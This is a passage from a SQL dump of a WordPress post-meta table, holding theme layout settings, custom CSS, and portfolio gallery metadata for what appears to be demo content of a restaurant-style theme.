0'),(39597,2457,'mkdf_disable_vertical_header_background_image_meta','no'),(39598,2457,'mkdf_disable_header_widget_areas_meta','no'),(39599,2457,'mkdf_title_area_type_meta','attika'),(39600,2457,'_dp_original','1185'),(39601,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39602,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39603,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39604,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39605,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39606,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39607,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39608,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39609,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39610,2472,'_wp_page_template','full-width.php'),(39611,2472,'slide_template','default'),(39612,2472,'_wpb_vc_js_status','true'),(39613,2472,'mkdf_page_content_behind_header_meta','no'),(39614,2472,'mkdf_disable_vertical_header_background_image_meta','no'),(39615,2472,'mkdf_disable_header_widget_areas_meta','no'),(39616,2472,'mkdf_page_content_padding','120px 0 105px'),(39617,2472,'_dp_original','1662'),(39618,2472,'_wpb_shortcodes_custom_css','.vc_custom_1533736057368{margin-top: -375px !important;}.vc_custom_1535626950960{margin-top: -60px !important;}.vc_custom_1535627671543{padding-top: 160px !important;padding-bottom: 120px !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}.vc_custom_1535632790817{padding-right: 10% !important;padding-left: 10% !important;}.vc_custom_1535119322528{margin-top: -20px !important;}'),(39619,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39620,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39621,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39622,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39623,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39624,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39625,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39626,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39627,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39628,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39629,2477,'_wp_page_template','full-width.php'),(39630,2477,'slide_template','default'),(39631,2477,'_wpb_vc_js_status','true'),(39632,2477,'mkdf_page_content_behind_header_meta','no'),(39633,2477,'mkdf_disable_vertical_header_background_image_meta','no'),(39634,2477,'mkdf_disable_header_widget_areas_meta','no'),(39635,2477,'mkdf_page_content_padding','120px 0 60px'),(39636,2477,'_dp_original','2472'),(39637,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39638,2494,'_wpb_shortcodes_custom_css','.vc_custom_1535628318862{padding-bottom: 70px !important;}.vc_custom_1535629459423{padding-top: 60px !important;padding-bottom: 110px !important;background-color: #f9f5f0 !important;}.vc_custom_1535626873687{padding-right: 10% !important;padding-left: 10% !important;}'),(39639,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39640,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39641,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39642,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39643,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39644,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39645,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39646,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39647,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39648,2494,'_wp_page_template','full-width.php'),(39649,2494,'slide_template','default'),(39650,2494,'_wpb_vc_js_status','true'),(39651,2494,'mkdf_page_content_behind_header_meta','no'),(39652,2494,'mkdf_disable_vertical_header_background_image_meta','no'),(39653,2494,'mkdf_disable_header_widget_areas_meta','no'),(39654,2494,'mkdf_page_content_padding','110px 0 155px'),(39655,2494,'_wpb_shortcodes_custom_css','.vc_custom_1535628318862{padding-bottom: 70px !important;}.vc_custom_1535629459423{padding-top: 60px !important;padding-bottom: 110px !important;background-color: #f9f5f0 !important;}.vc_custom_1535626873687{padding-right: 10% !important;padding-left: 10% !important;}'),(39656,2494,'_dp_original','2472'),(39657,2542,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39658,2542,'_wp_page_template','full-width.php'),(39659,2542,'slide_template','default'),(39660,2542,'_wpb_vc_js_status','true'),(39661,2542,'mkdf_page_content_behind_header_meta','no'),(39662,2542,'mkdf_disable_vertical_header_background_image_meta','no'),(39663,2542,'mkdf_disable_header_widget_areas_meta','no'),(39664,2542,'_wpb_shortcodes_custom_css','.vc_custom_1535962435703{padding-top: 80px !important;padding-bottom: 125px !important;}.vc_custom_1535967241855{padding-top: 50px !important;padding-bottom: 95px !important;}.vc_custom_1536937014058{margin-top: -15px !important;}.vc_custom_1537367428822{padding-top: 21% !important;padding-bottom: 18% !important;}'),(39665,2542,'mkdf_page_content_padding','0'),(39666,2542,'mkdf_disable_header_meta','yes'),(39667,2542,'mkdf_show_title_area_meta','no'),(39668,2542,'mkdf_disable_footer_meta','yes'),(39669,2542,'mkdf_smooth_page_transitions_meta','yes'),(39670,2542,'mkdf_page_transition_preloader_meta','yes'),(39671,2542,'mkdf_smooth_pt_spinner_type_meta','pulse'),(39672,2542,'mkdf_smooth_pt_spinner_color_meta','#000000'),(39673,2542,'_wpb_post_custom_css','.mkdf-landing-homes-section {\n    display: none;\n}\n\n.mkdf-landing-bottom-section:after {\n    position: absolute;\n    left: 0;\n    bottom: 0;\n    z-index: -23;\n    width: 29%;\n    height: 476px;\n    background-color: #fef8f7;\n}\n'),(39674,2625,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39675,2625,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39676,2625,'_wp_page_template','default'),(39677,2625,'slide_template','default'),(39678,2625,'_wpb_vc_js_status','true'),(39679,2625,'mkdf_page_content_behind_header_meta','no'),(39680,2625,'mkdf_page_content_padding','120px 0 160px 0'),(39681,2625,'mkdf_page_content_padding_mobile','120px 0 160px 0'),(39682,2625,'mkdf_disable_vertical_header_background_image_meta','no'),(39683,2625,'mkdf_disable_header_widget_areas_meta','no'),(39684,2625,'mkdf_title_area_type_meta','attika'),(39685,2625,'_dp_original','1151'),(39686,2627,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39687,2627,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39688,2627,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39689,2627,'_wp_page_template','default'),(39690,2627,'slide_template','default'),(39691,2627,'_wpb_vc_js_status','true'),(39692,2627,'mkdf_page_content_behind_header_meta','no'),(39693,2627,'mkdf_page_content_padding','120px 0 170px 0'),(39694,2627,'mkdf_page_content_padding_mobile','120px 0 170px 0'),(39695,2627,'mkdf_disable_vertical_header_background_image_meta','no'),(39696,2627,'mkdf_disable_header_widget_areas_meta','no'),(39697,2627,'mkdf_title_area_type_meta','attika'),(39698,2627,'_dp_original','1182'),(39699,2646,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39700,2646,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39701,2646,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39702,2646,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39703,2646,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39704,2646,'_wp_page_template','default'),(39705,2646,'slide_template','default'),(39706,2646,'_wpb_vc_js_status','true'),(39707,2646,'mkdf_page_content_behind_header_meta','no'),(39708,2646,'mkdf_page_content_padding','100px 0 120px 0'),(39709,2646,'mkdf_page_content_padding_mobile','100px 0 120px 0'),(39710,2646,'mkdf_disable_vertical_header_background_image_meta','no'),(39711,2646,'mkdf_disable_header_widget_areas_meta','no'),(39712,2646,'mkdf_title_area_type_meta','attika'),(39713,2646,'_dp_original','2457'),(39714,2652,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39715,2652,'_wp_page_template','default'),(39716,2652,'slide_template','default'),(39717,2652,'_wpb_vc_js_status','true'),(39718,2652,'mkdf_page_content_behind_header_meta','no'),(39719,2652,'mkdf_disable_vertical_header_background_image_meta','no'),(39720,2652,'mkdf_disable_header_widget_areas_meta','no'),(39721,2652,'mkdf_disable_header_meta','yes'),(39722,2652,'mkdf_show_title_area_meta','no'),(39723,2652,'mkdf_disable_footer_meta','yes'),(39724,2652,'mkdf_page_content_padding','0'),(39725,3075,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39726,3075,'_thumbnail_id','121'),(39727,3075,'mkdf_page_content_behind_header_meta','no'),(39728,3075,'mkdf_page_content_padding','115px 0 100px 0'),(39729,3075,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(39730,3075,'portfolio_single_back_to_link','81'),(39731,3075,'mkdf_disable_vertical_header_background_image_meta','no'),(39732,3075,'mkdf_disable_header_widget_areas_meta','no'),(39733,3075,'slide_template','default'),(39734,3075,'_wpb_vc_js_status','false'),(39735,3075,'mkdf-portfolio-image-gallery','1903,1902,1901'),(39736,3075,'mkdf_portfolio_single_template_meta','images'),(39737,3075,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(39738,3075,'_wp_old_slug','h1-1'),(39739,3076,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39740,3076,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39741,3076,'_thumbnail_id','137'),(39742,3076,'mkdf_page_content_behind_header_meta','no'),(39743,3076,'mkdf_page_content_padding','115px 0 100px 0'),(39744,3076,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(39745,3076,'portfolio_single_back_to_link','81'),(39746,3076,'mkdf_disable_vertical_header_background_image_meta','no'),(39747,3076,'mkdf_disable_header_widget_areas_meta','no'),(39748,3076,'slide_template','default'),(39749,3076,'_wpb_vc_js_status','true'),(39750,3076,'_dp_original','104'),(39751,3076,'mkdf-portfolio-image-gallery','567,566,565'),(39752,3076,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(39753,3076,'mkdf_portfolio_single_template_meta','small-images'),(39754,3076,'_wp_old_slug','h1-2'),(39755,3077,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39756,3077,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39757,3077,'_thumbnail_id','138'),(39758,3077,'mkdf_page_content_behind_header_meta','no'),(39759,3077,'mkdf_page_content_padding','115px 0 100px 0'),(39760,3077,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(39761,3077,'portfolio_single_back_to_link','81'),(39762,3077,'mkdf_disable_vertical_header_background_image_meta','no'),(39763,3077,'mkdf_disable_header_widget_areas_meta','no'),(39764,3077,'slide_template','default'),(39765,3077,'_wpb_vc_js_status','true'),(39766,3077,'_dp_original','104'),(39767,3077,'mkdf-portfolio-image-gallery','1901,1902,1903'),(39768,3077,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(39769,3077,'mkdf_portfolio_single_template_meta','slider'),(39770,3077,'_wp_old_slug','h1-3'),(39771,3077,'_wp_old_slug','homemade-dining'),(39772,3078,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39773,3078,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39774,3078,'_thumbnail_id','571'),(39775,3078,'mkdf_page_content_behind_header_meta','no'),(39776,3078,'mkdf_page_content_padding','115px 0 100px 0'),(39777,3078,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(39778,3078,'portfolio_single_back_to_link','569'),(39779,3078,'mkdf_disable_vertical_header_background_image_meta','no'),(39780,3078,'mkdf_disable_header_widget_areas_meta','no'),(39781,3078,'slide_template','default'),(39782,3078,'_wpb_vc_js_status','true'),(39783,3078,'mkdf-portfolio-image-gallery','565,566,567'),(39784,3078,'mkdf_portfolio_single_template_meta','small-slider'),(39785,3078,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(39786,3078,'_dp_original','104'),(39787,3078,'_wp_old_slug','h8-1'),(39788,3079,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39789,3079,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39790,3079,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39791,3079,'mkdf_page_content_behind_header_meta','no'),(39792,3079,'mkdf_page_content_padding','115px 0 100px 0'),(39793,3079,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(39794,3079,'portfolio_single_back_to_link','569'),(39795,3079,'mkdf_disable_vertical_header_background_image_meta','no'),(39796,3079,'mkdf_disable_header_widget_areas_meta','no'),(39797,3079,'slide_template','default'),(39798,3079,'_wpb_vc_js_status','true'),(39799,3079,'mkdf-portfolio-image-gallery','567,566,565'),(39800,3079,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(39801,3079,'mkdf_portfolio_single_template_meta','gallery'),(39802,3079,'_dp_original','136'),(52091,4354,'_menu_item_type','custom'),(39804,3079,'_wp_old_slug','h8-2'),(39805,3080,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39806,3080,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39807,3080,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39808,3080,'_thumbnail_id','584'),(39809,3080,'mkdf_page_content_behind_header_meta','no'),(39810,3080,'mkdf_page_content_padding','115px 0 100px 0'),(39811,3080,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(39812,3080,'portfolio_single_back_to_link','569'),(39813,3080,'mkdf_disable_vertical_header_background_image_meta','no'),(39814,3080,'mkdf_disable_header_widget_areas_meta','no'),(39815,3080,'slide_template','default'),(39816,3080,'_wpb_vc_js_status','true'),(39817,3080,'mkdf-portfolio-image-gallery','567,566,565'),(39818,3080,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(39819,3080,'mkdf_portfolio_single_template_meta','small-images'),(39820,3080,'_dp_original','141'),(39821,3080,'_wp_old_slug','h8-3'),(39822,3081,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39823,3081,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39824,3081,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39825,3081,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39826,3081,'_thumbnail_id','589'),(39827,3081,'mkdf_page_content_behind_header_meta','no'),(39828,3081,'mkdf_page_content_padding','115px 0 100px 0'),(39829,3081,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(39830,3081,'portfolio_single_back_to_link','569'),(39831,3081,'mkdf_disable_vertical_header_background_image_meta','no'),(39832,3081,'mkdf_disable_header_widget_areas_meta','no'),(39833,3081,'slide_template','default'),(39834,3081,'_wpb_vc_js_status','true'),(39835,3081,'mkdf-portfolio-image-gallery','567,566,565'),(39836,3081,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(39837,3081,'mkdf_portfolio_single_template_meta','masonry'),(39838,3081,'_dp_original','583'),(39839,3081,'_wp_old_slug','h8-4'),(39840,3082,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39841,3082,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39842,3082,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39843,3082,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39844,3082,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39845,3082,'_thumbnail_id','591'),(39846,3082,'mkdf_page_content_behind_header_meta','no'),(39847,3082,'mkdf_page_content_padding','115px 0 100px 0'),(39848,3082,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(39849,3082,'portfolio_single_back_to_link','569'),(39850,3082,'mkdf_disable_vertical_header_background_image_meta','no'),(39851,3082,'mkdf_disable_header_widget_areas_meta','no'),(39852,3082,'slide_template','default'),(39853,3082,'_wpb_vc_js_status','true'),(39854,3082,'mkdf-portfolio-image-gallery','567,566,565'),(39855,3082,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(39856,3082,'mkdf_portfolio_single_template_meta','slider'),(39857,3082,'_dp_original','588'),(39858,3082,'_wp_old_slug','h8-5'),(39859,3083,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39860,3083,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39861,3083,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39862,3083,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39863,3083,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39864,3083,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39865,3083,'mkdf_page_content_behind_header_meta','no'),(39866,3083,'mkdf_page_content_padding','115px 0 100px 0'),(39867,3083,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(39868,3083,'portfolio_single_back_to_link','569'),(39869,3083,'mkdf_disable_vertical_header_background_image_meta','no'),(39870,3083,'mkdf_disable_header_widget_areas_meta','no'),(39871,3083,'slide_template','default'),(39872,3083,'_wpb_vc_js_status','true'),(39873,3083,'mkdf-portfolio-image-gallery','567,566,565'),(39874,3083,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(39875,3083,'mkdf_portfolio_single_template_meta','small-slider'),(39876,3083,'_dp_original','590'),(39877,3083,'_thumbnail_id','594'),(39878,3083,'_wp_old_slug','h8-6'),(39879,618,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39880,618,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39881,618,'mkdf_page_content_behind_header_meta','no'),(39882,618,'mkdf_page_content_padding','115px 0 100px 0'),(39883,618,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(39884,618,'portfolio_single_back_to_link','610'),(39885,618,'mkdf_disable_vertical_header_background_image_meta','no'),(39886,618,'mkdf_disable_header_widget_areas_meta','no'),(39887,618,'slide_template','default'),(39888,618,'_wpb_vc_js_status','false'),(39889,618,'mkdf-portfolio-image-gallery','565,566,567'),(39890,618,'mkdf_portfolio_single_template_meta','images'),(39891,618,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(39892,618,'_dp_original','104'),(39893,618,'_thumbnail_id','1095'),(39894,618,'_wp_old_slug','h6-1'),(39895,618,'_wp_old_slug','cold-raspberry-soup'),(39896,3084,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39897,3084,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39898,3084,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39899,3084,'mkdf_page_content_behind_header_meta','no'),(39900,3084,'mkdf_page_content_padding','115px 0 100px 0'),(39901,3084,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(39902,3084,'portfolio_single_back_to_link','610'),(39903,3084,'mkdf_disable_vertical_header_background_image_meta','no'),(39904,3084,'mkdf_disable_header_widget_areas_meta','no'),(39905,3084,'slide_template','default'),(39906,3084,'_wpb_vc_js_status','true'),(39907,3084,'mkdf-portfolio-image-gallery','567,566,565'),(39908,3084,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(39909,3084,'mkdf_portfolio_single_template_meta','small-images'),(39910,3084,'_dp_original','136'),(39911,3084,'_thumbnail_id','1096'),(39912,3084,'_wp_old_slug','h6-2'),(39913,3085,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39914,3085,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39915,3085,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39916,3085,'mkdf_page_content_behind_header_meta','no'),(39917,3085,'mkdf_page_content_padding','115px 0 100px 0'),(39918,3085,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(39919,3085,'portfolio_single_back_to_link','610'),(39920,3085,'mkdf_disable_vertical_header_background_image_meta','no'),(39921,3085,'mkdf_disable_header_widget_areas_meta','no'),(39922,3085,'slide_template','default'),(39923,3085,'_wpb_vc_js_status','true'),(39924,3085,'mkdf-portfolio-image-gallery','567,566,565'),(39925,3085,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(39926,3085,'mkdf_portfolio_single_template_meta','slider'),(39927,3085,'_dp_original','141'),(39928,3085,'_thumbnail_id','1098'),(39929,3085,'_wp_old_slug','h6-3'),(39930,3085,'_wp_old_slug','that-croissant'),(39931,3086,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39932,3086,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39933,3086,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39934,3086,'mkdf_page_content_behind_header_meta','no'),(39935,3086,'mkdf_page_content_padding','115px 0 100px 0'),(39936,3086,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(39937,3086,'portfolio_single_back_to_link','610'),(39938,3086,'mkdf_disable_vertical_header_background_image_meta','no'),(39939,3086,'mkdf_disable_header_widget_areas_meta','no'),(39940,3086,'slide_template','default'),(39941,3086,'_wpb_vc_js_status','true'),(39942,3086,'mkdf-portfolio-image-gallery','565,566,567'),(39943,3086,'mkdf_portfolio_single_template_meta','small-slider'),(39944,3086,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(39945,3086,'_dp_original','568'),(39946,3086,'_thumbnail_id','1097'),(39947,3086,'_wp_old_slug','h6-4'),(39948,3086,'_wp_old_slug','cream-soup'),(39949,3087,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39950,3087,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39951,3087,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39952,3087,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39953,3087,'mkdf_page_content_behind_header_meta','no'),(39954,3087,'mkdf_page_content_padding','115px 0 100px 0'),(39955,3087,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(39956,3087,'portfolio_single_back_to_link','610'),(39957,3087,'mkdf_disable_vertical_header_background_image_meta','no'),(39958,3087,'mkdf_disable_header_widget_areas_meta','no'),(39959,3087,'slide_template','default'),(39960,3087,'_wpb_vc_js_status','true'),(39961,3087,'mkdf-portfolio-image-gallery','567,566,565'),(39962,3087,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(39963,3087,'mkdf_portfolio_single_template_meta','gallery'),(39964,3087,'_dp_original','580'),(39965,3087,'_thumbnail_id','1099'),(39966,3087,'_wp_old_slug','h6-5'),(39967,3088,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39968,3088,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39969,3088,'mkdf_page_content_behind_header_meta','no'),(39970,3088,'mkdf_page_content_padding','115px 0 100px 0'),(39971,3088,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(39972,3088,'portfolio_single_back_to_link','610'),(39973,3088,'mkdf_disable_vertical_header_background_image_meta','no'),(39974,3088,'mkdf_disable_header_widget_areas_meta','no'),(39975,3088,'slide_template','default'),(39976,3088,'_wpb_vc_js_status','false'),(39977,3088,'mkdf-portfolio-image-gallery','565,566,567'),(39978,3088,'mkdf_portfolio_single_template_meta','images'),(39979,3088,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(39980,3088,'_dp_original','104'),(39981,3088,'_thumbnail_id','1101'),(39982,3088,'_wp_old_slug','h6-7'),(39983,3089,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39984,3089,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39985,3089,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39986,3089,'mkdf_page_content_behind_header_meta','no'),(39987,3089,'mkdf_page_content_padding','115px 0 100px 0'),(39988,3089,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(39989,3089,'portfolio_single_back_to_link','610'),(39990,3089,'mkdf_disable_vertical_header_background_image_meta','no'),(39991,3089,'mkdf_disable_header_widget_areas_meta','no'),(39992,3089,'slide_template','default'),(39993,3089,'_wpb_vc_js_status','true'),(39994,3089,'mkdf-portfolio-image-gallery','567,566,565'),(39995,3089,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(39996,3089,'mkdf_portfolio_single_template_meta','small-images'),(39997,3089,'_dp_original','136'),(39998,3089,'_thumbnail_id','1121'),(39999,3089,'_wp_old_slug','h6-6'),(40000,3090,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40001,3090,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40002,3090,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40003,3090,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40004,3090,'mkdf_page_content_behind_header_meta','no'),(40005,3090,'mkdf_page_content_padding','115px 0 100px 0'),(40006,3090,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(40007,3090,'portfolio_single_back_to_link','610'),(40008,3090,'mkdf_disable_vertical_header_background_image_meta','no'),(40009,3090,'mkdf_disable_header_widget_areas_meta','no'),(40010,3090,'slide_template','default'),(40011,3090,'_wpb_vc_js_status','true'),(40012,3090,'mkdf-portfolio-image-gallery','567,566,565'),(40013,3090,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(40014,3090,'mkdf_portfolio_single_template_meta','small-images'),(40015,3090,'_dp_original','649'),(40016,3090,'_thumbnail_id','1102'),(40017,3090,'_wp_old_slug','h6-8'),(40018,3091,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40019,3091,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40020,3091,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40021,3091,'mkdf_page_content_behind_header_meta','no'),(40022,3091,'mkdf_page_content_padding','115px 